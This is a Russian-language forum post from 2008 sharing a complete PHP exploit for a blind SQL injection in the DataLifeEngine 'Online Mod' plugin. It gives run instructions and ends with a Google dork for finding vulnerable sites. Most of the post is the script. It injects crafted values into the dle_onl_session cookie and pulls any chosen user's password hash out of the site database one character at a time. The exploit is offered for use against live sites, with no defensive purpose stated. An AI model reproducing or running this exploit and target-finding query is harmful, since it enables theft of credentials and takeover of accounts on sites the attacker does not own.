05.05.2008, 19:50
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
DataLifeEngine Online Mod Exploit Blind SQL Injection
DLE Online Mod Exploit Blind SQL Injection
Нашел багу я, а эксплойт написал Евгений Минаев
Сохраняем эксплойт и закидываем его к себе на локалхост, от туда запускаем.
Выдерает хеши любого юзера, шифрация md5(md5($pass))
PHP код:
<?php
/* vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4: */
/**
* DataLifeEngine Online Mod Exploit Blind SQL Injection. Found by Maxster
* Need magic_quotes_gpc off and mysql version higher than 4.0 (on server)
*
* Useful: email, password, name
*
* PHP versions 4 and 5
*
* LICENSE: This source file is subject to version 3.0 of the PHP license
* that is available through the world-wide-web at the following URI:
* http://www.php.net/license/3_0.txt. If you did not receive a copy of
* the PHP License and are unable to obtain it through the web, please
* send a note to license@php.net so we can mail you a copy immediately.
*
* @category Exploit
* @package None
* @author Eugene Minaev <underwater@itdefence.ru>
* @copyright 2008 ITDefence.ru
* @license http://www.php.net/license/3_0.txt PHP License 3.0
* @version CVS: $Id:$
* @link http://underwater.itdefence.ru
* @since File available since Release 0x00
*/
@set_time_limit(0);
@ini_set('output_buffer', 0);
?>
<html>
<head>
<title>DataLifeEngine Online Mod Exploit Blind SQL Injection</title>
<style type="text/css">
body{
font-family: Tahoma;
font-size: 12px;
color: #e1e1e1;
background-color: #222;
}
</style>
</head>
<body>
<center>
<form method="post" action="<?php echo $_SERVER['SCRIPT_NAME']?>">
dle path:<input type="text" name="server" value="http://localhost/dle/" />
<br/><br/>
admin id: <input type="text" name="userid" value="1" />
<br/><br/>
<input type="submit" />
</form>
</center>
</body>
</html>
<?php
if (!empty($_POST))
{
$_ = create_function('$error', 'die("$error");');
$userid = isset($_POST['userid']) ? (int) $_POST['userid'] : null;
$server = isset($_POST['server']) ? $_POST['server'] : null;
$alphabet = array('a', 'b', 'c', 'd', 'e', 'f', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0');
$responce = null;
$password = null;
$curpos = 1;
$alppos = 0;
$flag = false;
$pathinfo = parse_url($server);
if (false === is_array($pathinfo) or empty($pathinfo['host'])) {
$_('invalid url');
} else {
$fsocket = fsockopen($pathinfo['host'], 80) or
$_('hostname is dead');
$request = "GET {$pathinfo['path']} HTTP/1.1\r\n"
. "Host: {$pathinfo['host']}\r\n"
. "Cookie: dle_onl_session='underWHAT?!\r\n\r\n";
fwrite($fsocket, $request) or
$_ ('failed to write data to socket');
while ($flag === false){
$responce .= fread($fsocket, 128);
$flag = strpos($responce, '</html>') ? true: false;
}
$flag = false;
if (strpos($responce, 'MySQL Error') > 0){
while (strlen($password) < 32)
{
$fsocket = fsockopen($pathinfo['host'], 80) or
$_('hostname is dead');
$responce = null;
$cookie = "' or 1=if(substring((select password from dle_users where user_id = $userid),$curpos,1)='{$alphabet[$alppos]}',1,(select 1 union select 3))/*";
$request = "GET {$pathinfo['path']} HTTP/1.1\r\n"
. "Host: {$pathinfo['host']}\r\n"
. "Connection: close\r\n"
. "Cookie: dle_onl_session=$cookie\r\n\r\n";
fwrite($fsocket, $request) or
$_ ('failed to write data to socket');
$responce = fread($fsocket, 8000);
if (!strpos($responce, 'returns more than 1 row')){
$password .= $alphabet[$alppos];
$curpos += 1;
$alppos = 0;
} else {
$alppos += 1;
}
$flag = false;
$responce = null;
fclose($fsocket);
}
} else {
die ('<center><h1>not vulnerable</h1></center>');
}
echo "<center><h1>$password</h1></center>";
}
}
?>
Google dork: "20ка посетивших:"
|
|
|